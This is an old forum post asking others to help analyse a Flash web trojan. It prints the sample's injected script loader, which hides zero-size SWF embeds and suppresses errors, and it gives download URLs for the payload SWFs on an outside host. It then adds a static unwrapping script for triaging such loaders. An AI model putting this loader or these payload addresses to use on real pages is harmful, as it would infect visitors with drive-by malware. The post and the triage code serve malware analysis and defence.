[Old post]
[Discussion] A strange Flash web trojan, different from the 12-file kind
Posted:
2008-10-21 12:06
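I came across a Flash web trojan sample by chance. After decrypting the swf, the only plaintext in it is a small amount like ly20088.asp?, and I haven't figured out how this web trojan works. I looked up some material: an expert had also analyzed this kind, which is a legitimate SWF wrapping an illegitimate SWF file, but he had no sample on hand at the time, so he did not continue the analysis. What does everyone think?
The code is as follows: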
<script>
document.writeln("<script>function init(){window.status=\"\";}window.onload = init;");
document.writeln("window.onerror=function(){return true;}");
document.writeln("");
document.writeln("if(navigator.userAgent.toLowerCase().indexOf(\"msie\")>0)");
document.writeln("{");
document.writeln("document.write(\'<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http:\/\/download.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=4,0,19,0\" width=\"0\" height=\"0\" align=\"middle\">\');");
document.writeln("document.write(\'<param name=\"allowScriptAccess\" value=\"sameDomain\"\/>\');");
document.writeln("document.write(\'<param name=\"movie\" value=\"ifff.swf\"\/>\');");
document.writeln("document.write(\'<param name=\"quality\" value=\"high\"\/>\');");
document.writeln("document.write(\'<param name=\"bgcolor\" value=\"#ffffff\"\/>\');");
document.writeln("document.write(\'<embed src=\"ifff.swf\"\/>\');");
document.writeln("document.write(\'<\/object>\');");
document.writeln("}");
document.writeln("else{document.write(\'<EMBED src=\"ffff.swf\" width=0 height=0>\');}");
document.writeln("<\/script>")
</script>
SWF download addresses: http://usa.ccxtt.com/ifff.swf http://usa.ccxtt.com/ffff.swf
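For triage of a loader shaped like the one posted above, the nested document.writeln/document.write layers can be peeled statically, without opening the page in a browser, to list the SWF files it references and any zero-size plugin tags. This is an added example and not part of the original post: the sample input is constructed, a.swf and b.swf are placeholder names, and the function names are hypothetical.

```javascript
// Added example: nothing is executed; string literals are decoded by hand.
// SAMPLE is constructed (same shape as the posted loader); a.swf and b.swf are placeholders.
const SAMPLE = String.raw`document.writeln("if(navigator.userAgent.toLowerCase().indexOf(\"msie\")>0){");
document.writeln("document.write(\'<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"0\" height=\"0\">\');");
document.writeln("document.write(\'<param name=\"movie\" value=\"a.swf\"\/>\');");
document.writeln("document.write(\'<\/object>\');");
document.writeln("}else{document.write(\'<EMBED src=\"b.swf\" width=0 height=0>\');}");`;

// Decode the body of a JS string literal (single-character escapes only).
function decodeLiteral(body) {
  return body.replace(/\\(.)/g, (_, c) => ({ n: "\n", t: "\t", r: "\r" }[c] ?? c));
}

// Peel one layer: concatenate what every document.write/writeln("...") call would emit.
// Returns null when the text contains no such call. Branch conditions are ignored on
// purpose, so markup from both the MSIE and the non-MSIE path is collected.
function unwrapOnce(src) {
  const call = /document\.write(ln)?\(\s*(["'])((?:\\.|(?!\2)[^\\])*)\2\s*\)/g;
  let out = "", found = false;
  for (const m of src.matchAll(call)) {
    found = true;
    out += decodeLiteral(m[3]) + (m[1] ? "\n" : "");
  }
  return found ? out : null;
}

// Peel all layers (bounded), then list SWF references and zero-size plugin tags.
function analyze(src) {
  let text = src, layers = 0, next;
  while (layers < 10 && (next = unwrapOnce(text)) !== null) { text = next; layers++; }
  const swfRefs = new Set(), zeroSizeTags = [];
  for (const [tag, name] of text.matchAll(/<(object|embed|param)\b[^>]*>/gi)) {
    const attrs = {};
    for (const a of tag.matchAll(/([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g))
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
    for (const v of [attrs.src, attrs.value])
      if (v && /\.swf(\?|#|$)/i.test(v)) swfRefs.add(v);
    if (Number(attrs.width) === 0 && Number(attrs.height) === 0)
      zeroSizeTags.push(name.toLowerCase());
  }
  return { layers, html: text, swfRefs: [...swfRefs], zeroSizeTags };
}

console.log(analyze(SAMPLE));
```

The string-literal decoder handles only the single-character escapes seen in this kind of loader; hex, unicode or string-concatenation obfuscation would need additional handling.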